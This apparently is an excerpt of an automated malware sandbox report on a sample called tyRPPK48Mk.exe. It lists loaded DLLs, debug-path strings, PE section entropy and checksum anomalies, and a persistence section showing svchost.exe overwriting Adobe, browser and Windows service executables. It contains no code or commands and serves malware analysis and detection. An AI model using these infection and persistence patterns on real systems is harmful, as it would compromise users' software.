              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: tyRPPK48Mk.exeStatic file information: File size 3101805 > 1048576
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: svchost.exe, 00000006.00000003.2475292212.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: svchost.exe, 00000006.00000003.2571026895.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552676258.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2555692425.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: svchost.exe, 00000006.00000003.1940200063.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000006.00000003.1848418445.0000000005560000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: svchost.exe, 00000006.00000003.2166044684.0000000004C90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: svchost.exe, 00000006.00000003.2024944125.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: svchost.exe, 00000006.00000003.2309255812.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: svchost.exe, 00000006.00000003.2309255812.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000006.00000003.1940200063.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdb source: svchost.exe, 00000006.00000003.2329602484.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: svchost.exe, 00000006.00000003.2631630815.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2637810667.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: svchost.exe, 00000006.00000003.1892510705.0000000005750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3178209395.0000000001470000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: svchost.exe, 00000006.00000003.1951393165.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: name.exe, 00000001.00000003.1802681812.0000000005030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000001.00000003.1802504246.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1821978946.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1818359606.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1837727518.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1840416756.0000000005860000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: svchost.exe, 00000006.00000003.2278103872.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdbGCTL source: svchost.exe, 00000006.00000003.1990664261.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MsSense.pdb source: svchost.exe, 00000006.00000003.1990664261.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: svchost.exe, 00000006.00000003.2608906582.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: svchost.exe, 00000006.00000003.2482581363.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2496506784.0000000004B80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdbGCTL source: svchost.exe, 00000006.00000003.2075539957.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: svchost.exe, 00000006.00000003.2362639087.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb((( source: svchost.exe, 00000006.00000003.2178027420.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: svchost.exe, 00000006.00000003.1987958380.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1978746407.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: svchost.exe, 00000006.00000003.1876194254.00000000056D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: svchost.exe, 00000006.00000003.2329602484.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: svchost.exe, 00000006.00000003.2193636183.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Acrobat_SL.pdb source: svchost.exe, 00000006.00000003.2178027420.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: svchost.exe, 00000006.00000003.2571026895.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552676258.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2555692425.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: svchost.exe, 00000006.00000003.2278103872.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: svchost.exe, 00000006.00000003.2385840703.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: svchost.exe, 00000006.00000003.2166044684.0000000004C90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: svchost.exe, 00000006.00000003.2631630815.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2637810667.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: svchost.exe, 00000006.00000003.1919148439.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdbGCTL source: svchost.exe, 00000006.00000003.1951393165.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdbGCTL source: svchost.exe, 00000006.00000003.1931405560.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: 64BitMAPIBroker.pdb source: svchost.exe, 00000006.00000003.2453584126.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdbGCTL source: svchost.exe, 00000006.00000003.2004063369.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdbGCTL source: svchost.exe, 00000006.00000003.1964254852.0000000005720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1975873172.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1966295550.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: svchost.exe, 00000006.00000003.2608906582.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: svchost.exe, 00000006.00000003.2432675812.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: svchost.exe, 00000006.00000003.2362639087.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: svchost.exe, 00000006.00000003.2475292212.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerfHost.pdb source: svchost.exe, 00000006.00000003.1964254852.0000000005720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1975873172.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1966295550.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: svchost.exe, 00000006.00000003.2385840703.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: svchost.exe, 00000006.00000003.2438532554.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: svchost.exe, 00000006.00000003.1919148439.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: svchost.exe, 00000006.00000003.2482581363.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2496506784.0000000004B80000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: name.exe, 00000001.00000003.1802681812.0000000005030000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000001.00000003.1802504246.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1821978946.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000003.1818359606.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1837727518.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000003.1840416756.0000000005860000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdb source: svchost.exe, 00000006.00000003.2032642838.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: TieringEngineService.pdbGCTL source: svchost.exe, 00000006.00000003.2032642838.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WmiApSrv.pdb source: svchost.exe, 00000006.00000003.2075539957.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: svchost.exe, 00000006.00000003.2393262607.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntkrnlmp.pdbce_T151c2VyQ29udGV4dElkPTUsYSw=p source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ALG.pdb source: svchost.exe, 00000006.00000003.1854023776.0000000005890000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msdtcexe.pdb source: svchost.exe, 00000006.00000003.1931405560.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: svchost.exe, 00000006.00000003.1876194254.00000000056D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ALG.pdbGCTL source: svchost.exe, 00000006.00000003.1854023776.0000000005890000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: svchost.exe, 00000006.00000003.1892510705.0000000005750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3178209395.0000000001470000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: svchost.exe, 00000006.00000003.1987958380.00000000054F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1978746407.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: svchost.exe, 00000006.00000003.2193636183.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdbX source: svchost.exe, 00000006.00000003.2024944125.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: svchost.exe, 00000006.00000003.2602531162.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: snmptrap.pdb source: svchost.exe, 00000006.00000003.2004063369.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: svchost.exe, 00000006.00000003.2438532554.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: svchost.exe, 00000006.00000003.2393262607.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: svchost.exe, 00000006.00000003.2602531162.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBIEnloh source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp
              Source: msiexec.exe.6.drStatic PE information: 0x88D88F1C [Thu Oct 2 20:16:28 2042 UTC]
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: name.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x2ffd40
              Source: tyRPPK48Mk.exeStatic PE information: real checksum: 0xa961f should be: 0x2ffd40
              Source: default-browser-agent.exe.6.drStatic PE information: section name: .00cfg
              Source: default-browser-agent.exe.6.drStatic PE information: section name: .voltbl
              Source: firefox.exe.6.drStatic PE information: section name: .00cfg
              Source: firefox.exe.6.drStatic PE information: section name: .freestd
              Source: firefox.exe.6.drStatic PE information: section name: .retplne
              Source: firefox.exe.6.drStatic PE information: section name: .voltbl
              Source: GoogleCrashHandler64.exe.6.drStatic PE information: section name: _RDATA
              Source: GoogleCrashHandler64.exe.6.drStatic PE information: section name: .gxfg
              Source: GoogleCrashHandler64.exe.6.drStatic PE information: section name: .gehcont
              Source: GoogleUpdateComRegisterShell64.exe.6.drStatic PE information: section name: _RDATA
              Source: GoogleUpdateComRegisterShell64.exe.6.drStatic PE information: section name: .gxfg
              Source: GoogleUpdateComRegisterShell64.exe.6.drStatic PE information: section name: .gehcont
              Source: maintenanceservice.exe.6.drStatic PE information: section name: .00cfg
              Source: maintenanceservice.exe.6.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe.6.drStatic PE information: section name: _RDATA
              Source: minidump-analyzer.exe.6.drStatic PE information: section name: .00cfg
              Source: minidump-analyzer.exe.6.drStatic PE information: section name: .voltbl
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: section name: .00cfg
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: section name: .retplne
              Source: pingsender.exe.6.drStatic PE information: section name: .00cfg
              Source: pingsender.exe.6.drStatic PE information: section name: .voltbl
              Source: plugin-container.exe.6.drStatic PE information: section name: .00cfg
              Source: plugin-container.exe.6.drStatic PE information: section name: .voltbl
              Source: private_browsing.exe.6.drStatic PE information: section name: .00cfg
              Source: private_browsing.exe.6.drStatic PE information: section name: .voltbl
              Source: updater.exe.6.drStatic PE information: section name: .00cfg
              Source: updater.exe.6.drStatic PE information: section name: .voltbl
              Source: updater.exe.6.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe.6.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe.6.drStatic PE information: section name: .gxfg
              Source: elevation_service.exe.6.drStatic PE information: section name: .retplne
              Source: elevation_service.exe.6.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe.6.drStatic PE information: section name: malloc_h
              Source: elevation_service.exe0.6.dr Static PE information: section name: .00cfg
              Source: elevation_service.exe0.6.dr Static PE information: section name: .gxfg
              Source: elevation_service.exe0.6.dr Static PE information: section name: .retplne
              Source: elevation_service.exe0.6.dr Static PE information: section name: _RDATA
              Source: elevation_service.exe0.6.dr Static PE information: section name: malloc_h
              Source: maintenanceservice.exe0.6.dr Static PE information: section name: .00cfg
              Source: maintenanceservice.exe0.6.dr Static PE information: section name: .voltbl
              Source: maintenanceservice.exe0.6.dr Static PE information: section name: _RDATA
              Source: msdtc.exe.6.dr Static PE information: section name: .didat
              Source: msiexec.exe.6.dr Static PE information: section name: .didat
              Source: armsvc.exe.6.dr Static PE information: section name: .didat
              Source: alg.exe.6.dr Static PE information: section name: .didat
              Source: FXSSVC.exe.6.dr Static PE information: section name: .didat
              Source: MsSense.exe.6.dr Static PE information: section name: .didat
              Source: unpack200.exe.6.dr Static PE information: section name: .00cfg
              Source: Spectrum.exe.6.dr Static PE information: section name: .didat
              Source: TieringEngineService.exe.6.dr Static PE information: section name: .didat
              Source: vds.exe.6.dr Static PE information: section name: .didat
              Source: VSSVC.exe.6.dr Static PE information: section name: .didat
              Source: WmiApSrv.exe.6.dr Static PE information: section name: .didat
              Source: wmpnetwk.exe.6.dr Static PE information: section name: .didat
              Source: SearchIndexer.exe.6.dr Static PE information: section name: .didat
              Source: ie_to_edge_stub.exe.6.dr Static PE information: section name: .00cfg
              Source: ie_to_edge_stub.exe.6.dr Static PE information: section name: .gxfg
              Source: ie_to_edge_stub.exe.6.dr Static PE information: section name: .retplne
              Source: ie_to_edge_stub.exe.6.dr Static PE information: section name: _RDATA
              Source: cookie_exporter.exe.6.dr Static PE information: section name: .00cfg
              Source: cookie_exporter.exe.6.dr Static PE information: section name: .gxfg
              Source: cookie_exporter.exe.6.dr Static PE information: section name: .retplne
              Source: cookie_exporter.exe.6.dr Static PE information: section name: _RDATA
              Source: identity_helper.exe.6.dr Static PE information: section name: .00cfg
              Source: identity_helper.exe.6.dr Static PE information: section name: .gxfg
              Source: identity_helper.exe.6.dr Static PE information: section name: .retplne
              Source: identity_helper.exe.6.dr Static PE information: section name: _RDATA
              Source: identity_helper.exe.6.dr Static PE information: section name: malloc_h
              Source: setup.exe.6.dr Static PE information: section name: .00cfg
              Source: setup.exe.6.dr Static PE information: section name: .gxfg
              Source: setup.exe.6.dr Static PE information: section name: .retplne
              Source: setup.exe.6.dr Static PE information: section name: LZMADEC
              Source: setup.exe.6.dr Static PE information: section name: _RDATA
              Source: setup.exe.6.dr Static PE information: section name: malloc_h
              Source: msedgewebview2.exe.6.dr Static PE information: section name: .00cfg
              Source: msedgewebview2.exe.6.dr Static PE information: section name: .gxfg
              Source: msedgewebview2.exe.6.dr Static PE information: section name: .retplne
              Source: msedgewebview2.exe.6.dr Static PE information: section name: CPADinfo
              Source: msedgewebview2.exe.6.dr Static PE information: section name: LZMADEC
              Source: msedgewebview2.exe.6.dr Static PE information: section name: _RDATA
              Source: msedgewebview2.exe.6.dr Static PE information: section name: malloc_h
              Source: msedge_proxy.exe.6.dr Static PE information: section name: .00cfg
              Source: msedge_proxy.exe.6.dr Static PE information: section name: .gxfg
              Source: msedge_proxy.exe.6.dr Static PE information: section name: .retplne
              Source: msedge_proxy.exe.6.dr Static PE information: section name: _RDATA
              Source: msedge_proxy.exe.6.dr Static PE information: section name: malloc_h
              Source: msedge_pwa_launcher.exe.6.dr Static PE information: section name: .00cfg
              Source: msedge_pwa_launcher.exe.6.dr Static PE information: section name: .gxfg
              Source: msedge_pwa_launcher.exe.6.dr Static PE information: section name: .retplne
              Source: msedge_pwa_launcher.exe.6.dr Static PE information: section name: LZMADEC
              Source: msedge_pwa_launcher.exe.6.dr Static PE information: section name: _RDATA
              Source: msedge_pwa_launcher.exe.6.dr Static PE information: section name: malloc_h
              Source: notification_click_helper.exe.6.dr Static PE information: section name: .00cfg
              Source: notification_click_helper.exe.6.dr Static PE information: section name: .gxfg
              Source: notification_click_helper.exe.6.dr Static PE information: section name: .retplne
              Source: notification_click_helper.exe.6.dr Static PE information: section name: CPADinfo
              Source: notification_click_helper.exe.6.dr Static PE information: section name: _RDATA
              Source: notification_click_helper.exe.6.dr Static PE information: section name: malloc_h
              Source: pwahelper.exe.6.dr Static PE information: section name: .00cfg
              Source: pwahelper.exe.6.dr Static PE information: section name: .gxfg
              Source: pwahelper.exe.6.dr Static PE information: section name: .retplne
              Source: pwahelper.exe.6.dr Static PE information: section name: _RDATA
              Source: pwahelper.exe.6.dr Static PE information: section name: malloc_h
              Source: msedge_proxy.exe0.6.dr Static PE information: section name: .00cfg
              Source: msedge_proxy.exe0.6.dr Static PE information: section name: .gxfg
              Source: msedge_proxy.exe0.6.dr Static PE information: section name: .retplne
              Source: msedge_proxy.exe0.6.dr Static PE information: section name: _RDATA
              Source: msedge_proxy.exe0.6.dr Static PE information: section name: malloc_h
              Source: Acrobat.exe.6.dr Static PE information: section name: .didat
              Source: Acrobat.exe.6.dr Static PE information: section name: _RDATA
              Source: AcroCEF.exe.6.dr Static PE information: section name: .didat
              Source: AcroCEF.exe.6.dr Static PE information: section name: _RDATA
              Source: pwahelper.exe0.6.dr Static PE information: section name: .00cfg
              Source: pwahelper.exe0.6.dr Static PE information: section name: .gxfg
              Source: pwahelper.exe0.6.dr Static PE information: section name: .retplne
              Source: pwahelper.exe0.6.dr Static PE information: section name: _RDATA
              Source: pwahelper.exe0.6.dr Static PE information: section name: malloc_h
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_00402654 push 8B0000B1h; iretd 0_2_00402659
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_00462463 push edi; ret 1_2_00462465
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 1_2_00416CB5 push ecx; ret 1_2_00416CC8
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_00462463 push edi; ret 3_2_00462465
              Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 3_2_00416CB5 push ecx; ret 3_2_00416CC8
              Source: default-browser-agent.exe.6.dr Static PE information: section name: .reloc entropy: 7.941513660026067
              Source: firefox.exe.6.dr Static PE information: section name: .reloc entropy: 7.93887388458026
              Source: minidump-analyzer.exe.6.dr Static PE information: section name: .reloc entropy: 7.935440513053074
              Source: 117.0.5938.132_chrome_installer.exe.6.dr Static PE information: section name: .reloc entropy: 7.934736259673055
              Source: elevation_service.exe.6.dr Static PE information: section name: .reloc entropy: 7.943918524487799
              Source: elevation_service.exe0.6.dr Static PE information: section name: .reloc entropy: 7.945924268600776
              Source: Aut2exe.exe.6.dr Static PE information: section name: .rsrc entropy: 7.800626389616807
              Source: AppVClient.exe.6.dr Static PE information: section name: .reloc entropy: 7.93649060877241
              Source: FXSSVC.exe.6.dr Static PE information: section name: .reloc entropy: 7.9422548904612915
              Source: SensorDataService.exe.6.dr Static PE information: section name: .reloc entropy: 7.935355895957106
              Source: Spectrum.exe.6.dr Static PE information: section name: .reloc entropy: 7.945415728324186
              Source: AgentService.exe.6.dr Static PE information: section name: .reloc entropy: 7.937091009432048
              Source: vds.exe.6.dr Static PE information: section name: .reloc entropy: 7.941045748846461
              Source: VSSVC.exe.6.dr Static PE information: section name: .reloc entropy: 7.939508466333068
              Source: wbengine.exe.6.dr Static PE information: section name: .reloc entropy: 7.941253589303184
              Source: wmpnetwk.exe.6.dr Static PE information: section name: .reloc entropy: 7.9465794243283545
              Source: SearchIndexer.exe.6.dr Static PE information: section name: .reloc entropy: 7.945830998623169
              Source: identity_helper.exe.6.dr Static PE information: section name: .reloc entropy: 7.940732812444733
              Source: setup.exe.6.dr Static PE information: section name: .reloc entropy: 7.944723894883075
              Source: msedgewebview2.exe.6.dr Static PE information: section name: .reloc entropy: 7.936556443377246
              Source: msedge_proxy.exe.6.dr Static PE information: section name: .reloc entropy: 7.942258384223362
              Source: msedge_pwa_launcher.exe.6.dr Static PE information: section name: .reloc entropy: 7.9462587980306765
              Source: notification_click_helper.exe.6.dr Static PE information: section name: .reloc entropy: 7.944006817193669
              Source: pwahelper.exe.6.dr Static PE information: section name: .reloc entropy: 7.940882612865116
              Source: msedge_proxy.exe0.6.dr Static PE information: section name: .reloc entropy: 7.942246486712946
              Source: 7zFM.exe.6.dr Static PE information: section name: .reloc entropy: 7.932115674220289
              Source: 7zG.exe.6.dr Static PE information: section name: .reloc entropy: 7.927661955452567
              Source: Acrobat.exe.6.dr Static PE information: section name: .reloc entropy: 7.940509411781235
              Source: AcroCEF.exe.6.dr Static PE information: section name: .reloc entropy: 7.9375397048497005
              Source: pwahelper.exe0.6.dr Static PE information: section name: .reloc entropy: 7.940887545213508

              Persistence and Installation Behavior

              Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\73722fd785394ff7.bin
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\SysWOW64\svchost.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
